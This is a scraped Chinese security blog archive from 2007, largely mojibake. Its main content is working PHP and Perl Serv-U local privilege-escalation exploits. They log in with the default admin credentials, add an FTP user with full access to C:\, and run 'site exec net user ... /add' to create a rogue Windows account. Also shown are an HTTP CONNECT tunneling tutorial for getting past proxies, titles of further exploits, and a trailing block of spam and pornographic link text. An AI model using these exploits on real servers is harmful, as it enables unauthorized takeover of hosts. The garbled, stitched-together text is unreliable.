<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- insert content here -->
</p>
</form>
</body>
</html>


PHP


<?php
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
  $sendbuf = "";
  $recvbuf = "";
  $domain = "-SETDOMAIN\r\n".
      "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
      "-TZOEnable=0\r\n".
      " TZOKey=\r\n";
  $adduser = "-SETUSERSETUP\r\n".
      "-IP=0.0.0.0\r\n".
      "-PortNo=2121\r\n".
      "-User=Will_Be\r\n".
      "-Password=Will_Be\r\n".
      "-HomeDir=c:\\\r\n".
      "-LoginMesFile=\r\n".
      "-Disable=0\r\n".
      "-RelPaths=1\r\n".
      "-NeedSecure=0\r\n".
      "-HideHidden=0\r\n".
      "-AlwaysAllowLogin=0\r\n".
      "-ChangePassword=0\r\n".
      "-QuotaEnable=0\r\n".
      "-MaxUsersLoginPerIP=-1\r\n".
      "-SpeedLimitUp=0\r\n".
      "-SpeedLimitDown=0\r\n".
      "-MaxNrUsers=-1\r\n".
      "-IdleTimeOut=600\r\n".
      "-SessionTimeOut=-1\r\n".
      "-Expire=0\r\n".
      "-RatioUp=1\r\n".
      "-RatioDown=1\r\n".
      "-RatiosCredit=0\r\n".
      "-QuotaCurrent=0\r\n".
      "-QuotaMaximum=0\r\n".
      "-Maintenance=None\r\n".
      "-PasswordType=Regular\r\n".
      "-Ratios=None\r\n".
      " Access=c:\\|RELP\r\n";
  $deldomain="-DELETEDOMAIN\r\n".
      "-IP=0.0.0.0\r\n".
      " PortNo=2121\r\n";
  $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER ".$_POST["User"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "SITE MAINTENANCE\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $domain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $adduser;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Exploit ...<br>";
  echo "**********************************************************<br>";
  $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "site exec ".$_POST["Command"]."\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Delete Domain ...<br>";
  echo "**********************************************************<br>";
  $sendbuf = $deldomain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  fclose($sock);
  fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" c>
<title>Serv-U Local Exploit By Will_Be</title>
</head>

<body>
<form method="post">
LocalPort:
<input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser:
<input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass:
<input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command銆:
<input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="鎻愪氦">銆銆
<input type="reset" name="Submit" value="閲嶇疆">
</form>
</body>
</html>


Perl
Perl鐨勯粯璁ゅ畨瑁呰礬寰勬槸錛欳:\Perl
鐒跺悗浣跨敤錛?br>perl 浣犵殑pl鏂囦歡鐨勮礬寰勩?br>鍦╓EBSHELL涓殑璺緞鏄繖鏍風殑錛?br>C:\perl\bin\perl 浣犵殑pl鏂囦歡鐨勮礬寰?
#!/usr/bin/perl
use IO::Socket;

binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';


use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "TEST<br><br>";

print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";


@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;


鍙跺瓙 2007-08-04 15:17 鍙戣〃璇勮
]]>Symantec 鏍稿績椹卞姩 symtdi.sys 鏈湴鏉冮檺鎻愬崌婕忔礊http://www.shnenglu.com/elva/archive/2007/07/20/28428.html鍙跺瓙鍙跺瓙Fri, 20 Jul 2007 04:15:00 GMThttp://www.shnenglu.com/elva/archive/2007/07/20/28428.htmlhttp://www.shnenglu.com/elva/comments/28428.htmlhttp://www.shnenglu.com/elva/archive/2007/07/20/28428.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/28428.htmlhttp://www.shnenglu.com/elva/services/trackbacks/28428.html闃呰鍏ㄦ枃

鍙跺瓙 2007-07-20 12:15 鍙戣〃璇勮
]]>Rav 鏍稿績椹卞姩 memscan.sys 鏈湴鏉冮檺鎻愬崌婕忔礊http://www.shnenglu.com/elva/archive/2007/07/20/28427.html鍙跺瓙鍙跺瓙Fri, 20 Jul 2007 04:14:00 GMThttp://www.shnenglu.com/elva/archive/2007/07/20/28427.htmlhttp://www.shnenglu.com/elva/comments/28427.htmlhttp://www.shnenglu.com/elva/archive/2007/07/20/28427.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/28427.htmlhttp://www.shnenglu.com/elva/services/trackbacks/28427.html闃呰鍏ㄦ枃

鍙跺瓙 2007-07-20 12:14 鍙戣〃璇勮
]]>Linux Kernel do_mremap VMA鏈湴鏉冮檺鎻愬崌婕忔礊http://www.shnenglu.com/elva/archive/2007/06/01/25237.html鍙跺瓙鍙跺瓙Thu, 31 May 2007 19:10:00 GMThttp://www.shnenglu.com/elva/archive/2007/06/01/25237.htmlhttp://www.shnenglu.com/elva/comments/25237.htmlhttp://www.shnenglu.com/elva/archive/2007/06/01/25237.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/25237.htmlhttp://www.shnenglu.com/elva/services/trackbacks/25237.html闃呰鍏ㄦ枃

鍙跺瓙 2007-06-01 03:10 鍙戣〃璇勮
]]>Kaspersky Anti-Virus 榪滅▼鍒犻櫎浠繪剰鏂囦歡婕忔礊鍒嗘瀽鍙婂埄鐢ㄤ唬鐮?/title><link>http://www.shnenglu.com/elva/archive/2007/05/31/25224.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Thu, 31 May 2007 12:44:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/05/31/25224.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/25224.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/25224.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/25224.html</trackback:ping><description><![CDATA[     鎽樿:   <a href='http://www.shnenglu.com/elva/archive/2007/05/31/25224.html'>闃呰鍏ㄦ枃</a><img src ="http://www.shnenglu.com/elva/aggbug/25224.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-05-31 20:44 <a href="http://www.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>鍛戒護鎵瑰鐞嗗疄鐜板3389鐧誨綍鐨勬棩蹇楄褰?http://www.shnenglu.com/elva/archive/2007/05/24/24732.html鍙跺瓙鍙跺瓙Wed, 23 May 2007 17:50:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/24/24732.htmlhttp://www.shnenglu.com/elva/comments/24732.htmlhttp://www.shnenglu.com/elva/archive/2007/05/24/24732.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24732.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24732.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-24 01:50 鍙戣〃璇勮
]]>鍒ゆ柇褰撳墠鐢ㄦ埛鏄惁涓虹郴緇熺鐞嗗憳http://www.shnenglu.com/elva/archive/2007/05/14/24080.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:56:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/14/24080.htmlhttp://www.shnenglu.com/elva/comments/24080.htmlhttp://www.shnenglu.com/elva/archive/2007/05/14/24080.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24080.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24080.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-14 00:56 鍙戣〃璇勮
]]>2000涓嬪彲鎵ц鏂囦歡淇敼鑷韓http://www.shnenglu.com/elva/archive/2007/05/14/24079.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:55:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/14/24079.htmlhttp://www.shnenglu.com/elva/comments/24079.htmlhttp://www.shnenglu.com/elva/archive/2007/05/14/24079.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24079.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24079.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-14 00:55 鍙戣〃璇勮
]]>絎竴涓敮鎸?000鍜?003涓嬪畬緹庤繘琛岀敤鎴峰厠闅嗙殑C婧愮爜(鍙湪webshell閲岀洿鎺ヨ繍琛?http://www.shnenglu.com/elva/archive/2007/05/14/24078.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:49:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/14/24078.htmlhttp://www.shnenglu.com/elva/comments/24078.htmlhttp://www.shnenglu.com/elva/archive/2007/05/14/24078.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/24078.htmlhttp://www.shnenglu.com/elva/services/trackbacks/24078.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-14 00:49 鍙戣〃璇勮
]]>MS Windows GDI Local Privilege Escalation Exploit (MS07-017) http://www.shnenglu.com/elva/archive/2007/05/08/23634.html鍙跺瓙鍙跺瓙Tue, 08 May 2007 08:49:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/08/23634.htmlhttp://www.shnenglu.com/elva/comments/23634.htmlhttp://www.shnenglu.com/elva/archive/2007/05/08/23634.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23634.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23634.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-08 16:49 鍙戣〃璇勮
]]>甯﹁緇嗚В閲婄殑鍐插嚮娉㈠師浠g爜http://www.shnenglu.com/elva/archive/2007/05/08/23633.html鍙跺瓙鍙跺瓙Tue, 08 May 2007 08:43:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/08/23633.htmlhttp://www.shnenglu.com/elva/comments/23633.htmlhttp://www.shnenglu.com/elva/archive/2007/05/08/23633.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23633.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23633.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-08 16:43 鍙戣〃璇勮
]]>HTTP Tunnelinghttp://www.shnenglu.com/elva/archive/2007/05/06/23526.html鍙跺瓙鍙跺瓙Sun, 06 May 2007 08:51:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/06/23526.htmlhttp://www.shnenglu.com/elva/comments/23526.htmlhttp://www.shnenglu.com/elva/archive/2007/05/06/23526.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23526.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23526.htmlIntroduction

HTTP Tunneling

HTTP is a text-based protocol to retrieve Web pages through a Web browser. Mostly, if you are on a LAN connection, you are behind a proxy server; this proxy server has one HTTP proxy running on some defined port. In your Internet Explorer's Connection option, you specify LAN settings as required. This proxy server is definitely running on a text-based protocol, and you can only get HTTP-related data from the outside network, right!! Well, there is a small loophole from which you can go through HTTP and connect to the outside world and get any data you want in binary protocol, or even your own protocol. It's through HTTPS.

HTTPS Explanation

In HTTPS, data is transferred from browser to server and server to browser in a secure manner. It's a binary protocol; when it goes through a proxy, the proxy doesn't understand anything. The proxy just allows a binary stream to open and lets both server and client exchange the data. Now, we can fool the proxy server and connect to any server and exchange data. The proxy server will think that we are doing some secure HTTP session.

For HTTPS, your browser connects to a proxy server and sends a command:

CONNECT neurospeech.com:443 HTTP/1.0 <CR><LF>
HOST neurospeech.com:443<CR><LF>
[... other HTTP header lines ending with <CR><LF> if required]>
<CR><LF>    // Last Empty Line

Then, the proxy server treats this as some HTTP Secure Session, and opens a binary stream to the required server and port as defined. If a connection is established, the proxy server returns the following response:

HTTP/1.0 200 Connection Established<CR><LF>
[.... other HTTP header lines ending with <CR><LF>..
ignore all of them]
<CR><LF>    // Last Empty Line

Now, the browser is connected to the end server and can exchange data in both a binary and secure form.

How to Do This

Now, it's your program's turn to fool the proxy server and behave as Internet Explorer behaves for Secure HTTP.

  1. Connect to Proxy Server first.
  2. Issue CONNECT Host:Port HTTP/1.1<CR><LF>.
  3. Issue <CR><LF>.
  4. Wait for a line of response. If it contains HTTP/1.X 200, the connection is successful.
  5. Read further lines of response until you receive an empty line.
  6. Now, you are connected to the outside world through a proxy. Do any data exchange you want.

Sample Source Code

Collapse
  // You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// a Line of response from socket until CRLF
try
{
CString Request,Response;
CSocketClient Client;
Client.ConnectTo("192.0.1.1",4480);
// Issue CONNECT Command
Request = "CONNECT mail.yahoo.com:25 HTTP/1.0";
Client<<Request;
// Issue empty line
Request = "";
Client<<Request;
// Receive Response From Server
Client>>Response;
// Ignore HTTP Version
int n = Response.Find(' ');
Response = Response.Mid(n+1);
// Http Response Must be 200 only
if(Response.Left(3)!="200")
{
// Connection refused from HTTP Proxy Server
AfxMessageBox(Response);
}
// Read Response Lines until you receive an empty line.
do
{
Client>>Response;
if (Response.IsEmpty())
break;
}while (true);
// Coooooooool.... Now connected to mail.yahoo.com:25
// Do further SMTP Protocol here..
}
catch (CSocketException * pE)
{
pE->ReportError();
}

Library Source Code

The Dns.h file contains all DNS-related source code. It uses other libraries, as SocketEx.h, SocketClient.h, and NeuroBuffer.h.

CSocketEx

Socket functions as a wrapper class. (CSocket is very heavy and unreliable if you don't have the exact idea of how it works.) All the functions are of the same name as CSocket. You can use this class directly.

CSocketClient

Derived from CSocketEx and throws proper exceptions with details of Winsock errors. It defines two operators, >> and <<, for easy sending and receiving; it also changes network to host and host to network order of bytes if required.

CHttpProxySocketClient

Derived from CSocketClient, you can call the SetProxySettings(ProxyServer,Port) method and set proxy settings. Then, you can connect to the desired host and port as you need. The ConnectTo method is overridden, and it automatically implements an HTTP proxy protocol and gives you a connection without any hassle.

How to Use CHttpProxySocketClient

Collapse
  // e.g. You need to connect to mail.yahoo.com on port 25
// Through a proxy on 192.0.1.1, on HTTP Proxy 4480
// CSocketClient is Socket wrapping class
// When you apply operator << on CString, it writes CString
// To Socket ending with CRLF
// When you apply operator >> on CString, it receives
// Line of response from socket until CRLF
try
{
CHttpProxySocketClient Client;
Client.SetProxySettings("192.0.1.1",1979);
// Connect to server mail.yahoo.com on port 25
Client.ConnectTo("mail.yahoo.com",25);
// You now have access to mail.yahoo.com on port 25
// If you do not call SetProxySettings, then
// you are connected to mail.yahoo.com directly if
// you have direct access, so always use
// CHttpProxySocketClient and no need to do any
// extra coding.
}
catch(CSocketException * pE) {
pE->ReportError();
}

Note: I usually don't program in the form of .h and .cpp different files, because using them the next time somewhere else is a big problem because you must move both files here and there. So, I put all the code in my .h file only; I don't write to the .cpp file unless it's required. You need to copy only the SocketEx.h, SocketClient.h, and HttpProxySocket.h files into your project's directory, and add line:

#include "HttpProxySocket.h"

after your:

#if !defined(.....

and so forth code of your Visual Studio-generated file. If you put anything above this, you will get n number of errors.

 



鍙跺瓙 2007-05-06 16:51 鍙戣〃璇勮
]]>榪滅▼妗岄潰瀹夊叏鍏ㄨВ錛堜笅錛?/title><link>http://www.shnenglu.com/elva/archive/2007/05/06/23524.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Sun, 06 May 2007 08:36:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/05/06/23524.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/23524.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/23524.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/23524.html</trackback:ping><description><![CDATA[     鎽樿:   <a href='http://www.shnenglu.com/elva/archive/2007/05/06/23524.html'>闃呰鍏ㄦ枃</a><img src ="http://www.shnenglu.com/elva/aggbug/23524.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-05-06 16:36 <a href="http://www.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>榪滅▼妗岄潰瀹夊叏鍏ㄨВ(涓?http://www.shnenglu.com/elva/archive/2007/05/06/23523.html鍙跺瓙鍙跺瓙Sun, 06 May 2007 08:35:00 GMThttp://www.shnenglu.com/elva/archive/2007/05/06/23523.htmlhttp://www.shnenglu.com/elva/comments/23523.htmlhttp://www.shnenglu.com/elva/archive/2007/05/06/23523.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/23523.htmlhttp://www.shnenglu.com/elva/services/trackbacks/23523.html闃呰鍏ㄦ枃

鍙跺瓙 2007-05-06 16:35 鍙戣〃璇勮
]]> 青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

    • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>

    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>

            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            
亚洲国产一成人久久精品|
亚洲美女电影在线|
国产精品久久久久9999|
欧美激情视频在线免费观看 欧美视频免费一|
欧美日韩在线视频一区|
亚洲高清视频在线观看|
国产亚洲激情视频在线|
亚洲天天影视|
亚洲永久免费精品|
欧美日本精品在线|
最新亚洲视频|
亚洲精品综合精品自拍|
免费在线国产精品|
欧美aaaaaaaa牛牛影院|
激情六月综合|
久久久福利视频|
久久久久久亚洲综合影院红桃|
国产精品青草久久|
亚洲五月婷婷|
欧美亚洲视频|
国产香蕉久久精品综合网|
亚洲欧美日韩电影|
欧美专区在线播放|
国产曰批免费观看久久久|
欧美亚洲综合另类|
久久亚洲国产成人|
精品成人乱色一区二区|
久久午夜精品|
亚洲激情专区|
亚洲视频欧洲视频|
国产精品美女主播|
欧美一区二区三区四区在线观看
|
亚洲欧美日韩精品久久久久|
午夜精品久久久久久久|
国产精品久久久一本精品|
亚洲天堂网在线观看|
小黄鸭视频精品导航|
国内精品久久久久国产盗摄免费观看完整版|
亚洲欧美激情视频|
久久久综合激的五月天|
亚洲国产一二三|
欧美日韩亚洲一区二区|
亚洲在线一区二区三区|
久久人91精品久久久久久不卡|
一区二区三区无毛|
欧美精品1区2区|
亚洲一区二区视频在线|
久久中文久久字幕|
日韩一二三在线视频播|
国产精品视频yy9299一区|
久久av一区二区三区|
亚洲国产欧美在线|
香蕉成人啪国产精品视频综合网|
狠狠色丁香婷婷综合久久片|
欧美激情影音先锋|
午夜精品福利在线|
亚洲国产一二三|
欧美影院在线播放|
亚洲国产欧美一区二区三区久久|
欧美偷拍一区二区|
久久久久久久一区二区三区|
999亚洲国产精|
久久综合国产精品台湾中文娱乐网|
亚洲精品男同|
国模一区二区三区|
欧美日韩亚洲一区|
久久综合九色九九|
亚洲永久在线|
亚洲精品久久|
嫩草国产精品入口|
羞羞漫画18久久大片|
亚洲精品国产系列|
国产一区三区三区|
国产精品久久久久一区二区三区|
免费在线一区二区|
欧美伊人久久|
亚洲伊人网站|
99国内精品|
亚洲国产精品久久久久婷婷老年|
久久精品国产96久久久香蕉|
亚洲午夜av电影|
亚洲三级免费观看|
在线日韩欧美视频|
国产亚洲欧美另类中文|
欧美久久久久久蜜桃|
麻豆精品视频在线|
久久久精品免费视频|
亚洲免费人成在线视频观看|
日韩一级精品视频在线观看|
亚洲国产精品成人一区二区|
久久综合国产精品|
久久蜜桃资源一区二区老牛|
欧美亚洲日本一区|
亚洲女人av|
亚洲一区一卡|
亚洲综合视频在线|
亚洲午夜久久久久久久久电影网|
亚洲精品中文字幕在线|
91久久在线播放|
亚洲国产成人高清精品|
怡红院精品视频在线观看极品|
国产亚洲制服色|
国产资源精品在线观看|
国产欧美日韩综合|
国产亚洲欧洲|
极品尤物av久久免费看
|
亚洲人体一区|
日韩天天综合|
一本色道久久88亚洲综合88|
一区二区三区不卡视频在线观看|
一本久久青青|
亚洲字幕一区二区|
欧美在线电影|
久久久国产成人精品|
美女尤物久久精品|
欧美freesex交免费视频|
欧美成人亚洲成人|
亚洲三级影院|
亚洲一区激情|
久久成人一区二区|
嫩草国产精品入口|
欧美日韩亚洲综合|
国产伦一区二区三区色一情|
国内精品国产成人|
亚洲老司机av|
亚洲欧美日韩在线综合|
久久aⅴ乱码一区二区三区|
久久精品国产999大香线蕉|
久久综合一区二区|
亚洲精品在线三区|
欧美亚洲一区|
欧美成人国产va精品日本一级|
欧美日韩精品一区二区在线播放|
国产精品日韩一区二区|
在线成人欧美|
中文av一区特黄|
久久婷婷蜜乳一本欲蜜臀|
亚洲国产婷婷|
性感少妇一区|
欧美精品激情在线观看|
国产精品久久一级|
91久久亚洲|
欧美专区在线|
亚洲伦理中文字幕|
久久不射网站|
欧美日韩性生活视频|
韩国女主播一区二区三区|
夜夜狂射影院欧美极品|
久久久99精品免费观看不卡|
亚洲精品美女免费|
久久久久国产一区二区|
欧美视频成人|
亚洲国产精品热久久|
欧美一级午夜免费电影|
最近中文字幕日韩精品|
香蕉av福利精品导航|
欧美日韩精品久久|
亚洲国产专区|
久久久99久久精品女同性|
99精品免费|
欧美粗暴jizz性欧美20|
国自产拍偷拍福利精品免费一|
中文欧美在线视频|
亚洲丰满在线|
久久综合国产精品|
国产亚洲精品aa午夜观看|
亚洲已满18点击进入久久
|
欧美va天堂va视频va在线|
亚洲免费在线看|
欧美日韩在线精品|
日韩亚洲欧美一区|
奶水喷射视频一区|
欧美中文字幕|
国产一区二区三区在线播放免费观看|
亚洲在线第一页|
99pao成人国产永久免费视频|
免费观看成人|
亚洲福利在线视频|
免费一级欧美片在线观看|
欧美在线播放|
国产日韩综合一区二区性色av|
亚洲欧美日韩综合|
一区二区三区四区五区精品|
欧美精品国产一区|
aⅴ色国产欧美|
91久久夜色精品国产九色|
米奇777在线欧美播放|
亚洲第一视频网站|
欧美.www|
欧美成人精品一区|
99精品视频一区|
99re6这里只有精品|
欧美日韩免费在线|
亚洲综合丁香|
亚洲在线一区|
好吊视频一区二区三区四区
|
欧美成在线视频|
亚洲精品在线观看免费|
亚洲全部视频|
国产精品久久久久久久午夜|